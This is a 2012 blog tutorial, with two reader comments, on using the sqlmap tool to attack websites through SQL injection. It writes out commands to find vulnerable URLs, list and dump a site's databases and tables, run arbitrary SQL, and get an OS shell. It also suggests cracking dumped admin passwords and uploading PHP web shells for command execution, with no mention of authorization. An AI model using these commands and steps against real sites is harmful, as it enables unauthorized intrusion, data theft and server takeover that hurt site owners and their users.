Why don't you help Animal?

Saturday, November 10, 2012


Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.

How To Use SqlMap?

(1)Download SQLMAP here.

(2)Now extract it wherever you want.

(3)Change directory & I mean if you extract to download then, open terminal & type following code

cd Downloads

cd sqlmapproject-sqlmap-f305dde

(4)Now if you want to find url is vulnerable to sql injection or not. Type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”


(5)To get database of website. Type following command in terminal

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs


(6)To get tables & columns of database , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--tables --columns



(7)To Get data of particular database & Table , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dump -D “database_name” -T “table _name”



Now , you can view all database from following directory.


What`s next you can do?

1-Execute arbitrary Sql command on the server

This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.

Another parameter --sql-shell would give an sql shell like interface to run queries interactively.

2-Get inside the admin panel and play

If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing, however long length complex passwords may not be breakable.

Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.

3-Shell on remote OS

This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.


kiwi Goldstein said...

The info given about the sql injection test for linux, as said it also works with windows, so is it works with all window operators or there is some specific changes require for running this test.

Nowles Norman said...

Thanks for providing complete information on how to do SQL injection from linux. I found screenshots helpful.
SQL injection test site

Post a Comment